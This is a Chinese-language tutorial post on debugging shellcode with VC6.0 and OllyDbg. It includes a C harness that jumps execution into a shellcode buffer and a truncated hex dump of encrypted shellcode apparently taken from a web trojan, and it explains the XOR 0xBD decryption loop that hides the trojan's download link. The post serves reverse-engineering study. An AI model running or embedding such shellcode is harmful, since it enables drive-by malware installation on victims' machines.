调试ShellCode
来源:互联网 发布:天猫旗舰店网址优化 编辑:程序博客网 时间:2024/05/16 02:21
ShellCode,对于我来说一直是一个心向往,而力所不及的技术,万事开头难,先从阅读别人的ShellCode开始吧!
先用VC6.0搭建一个ShellCode环境,之所以选择VC6.0不尽是因为其精简,由于VS之后的版本启用了/GS优化,使得调试ShellCode变的困难,所以建议使用VC6.0!
代码:
#include #include int main() { LoadLibrary("kernel32.dll"); //ShellCode中要使用的.dll char shellcode[]="/x58/x58/x58/x58"; //要调试的Shellcode __asm{ lea eax,shellcode push eax ret; //ret到ShellCode处 } return 0; }
将上面程序编译成exe,再用od打开就可以开始调试了!
下面来看一个具体的例子:
/x58/x58/x58/x58/xeb/x10/x5b/x4b/x33/xc9/x66/xb9/xb8/x03/x80/x34/x0b/xbd/xe2/xfa/xeb/x05/xe8/xeb
/xff/xff/xff/x54/xa3/xbe/xbd/xbd/xe2/xd9/x1c/x8d/xbd/xbd/xbd/x36/xfd/xb1/x36/xcd/xa1/x10/x36/xd5
/xb5/x36/x4a/xd7/xac/xe4/x55/x03/xbf/xbd/xbd/x2d/x5f/x45/xd5/x8e/x8f/xbd/xbd/xd5/xe8/xce/xd8/xcf
/xe9/x36/xfb/xb1/x55/x03/xbc/xbd/xbd/x36/x55/xd7/xb8/xe4/x55/x23/xbf/xbd/xbd/x5f/x44/xd5/xd2/xd3
/xbd/xbd/xd5/xc8/xcf/xd1/xd0/xe9/x42/xab/x38/x7d/xc8/xae/xd5/xd2/xd3/xbd/xbd/xd5/xc8/xcf/xd1/xd0
/xe9/x36/xfb/xb1/x55/x33/xbc/xbd/xbd/x36/x55/xd7/xbc/xe4/x55/xd3/xbf/xbd/xbd/x5f/x44/xd5/xd1/x8e
/x8f/xbd/xd5/xce/xd5/xd8/xd1/xe9/x36/xfb/xb1/x55/xd2/xbc/xbd/xbd/x36/x55/xd7/xbc/xe4/x55/xf2/xbf
/xbd/xbd/x5f/x44/x3c/x51/xbd/xbc/xbd/xbd/x36/x61/x3c/x7e/x3d/xbd/xbd/xbd/xd7/xbd/xd7/xa7/xee/xd7
…………
太长了,不贴出来,如果感兴趣,后面我已经给出测试工程
这是个网页木马里的ShellCode,一般网马的下载链接就藏在ShellCode中,不过这个比较复杂,他有加密功能,下面就通过od找出他的链接
来看od分析:
1.ShellCode入口:
2.关键call
这里要说明一下:不能单步到这里,会出现问题(我也不是很清楚,可能是寄存器环境之类的),在ShellCode入口处时就要在call处右击选择 此处为新eip
再F7步入,这样就到了核心的解密代码:
可以看出是一个循环,整个的处理方式非常巧妙:
利用了call指令的特性,会将下一条指令的地址压栈;这样就可以把call指令下面的机器码当做数据以供解密过程处理!
最关键的两行代码:
0012FB82 80340B BD xor byte ptr [ebx+ecx], 0BD
0012FB86 ^ E2 FA loopd short 0012FB82
可以看出是将ebx+ecx地址处的内容xor 0BD,并且每次要ecx--,直到退出循环
来看看最后的结果:(查看ebx+ecx地址的内容)
很清楚的看到,已经得到了链接!
附测试用例:
http://download.csdn.net/source/2719172
- shellcode 调试
- 调试ShellCode
- reverse shellcode调试问题问答
- 用VC 调试 Shellcode 方法
- Shellcode的分析调试技巧
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- shellcode
- Shellcode
- shellcode
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- 最大连续子段和
- IE里Iframe的Cookie问题解决办法总结
- 回调函数的开头
- 从资源中读取图片 GDI+
- setjmp与longjmp
- 调试ShellCode
- js页面的全屏展示和退出全屏显示
- 配置vim
- js cookie
- Request的RawUrl属性,和其它获取url信息的各种方法比较(转)
- AspNetPager分页实例
- Status Bar Notifications
- 常见火狐不支持问题
- Apache基本配置指南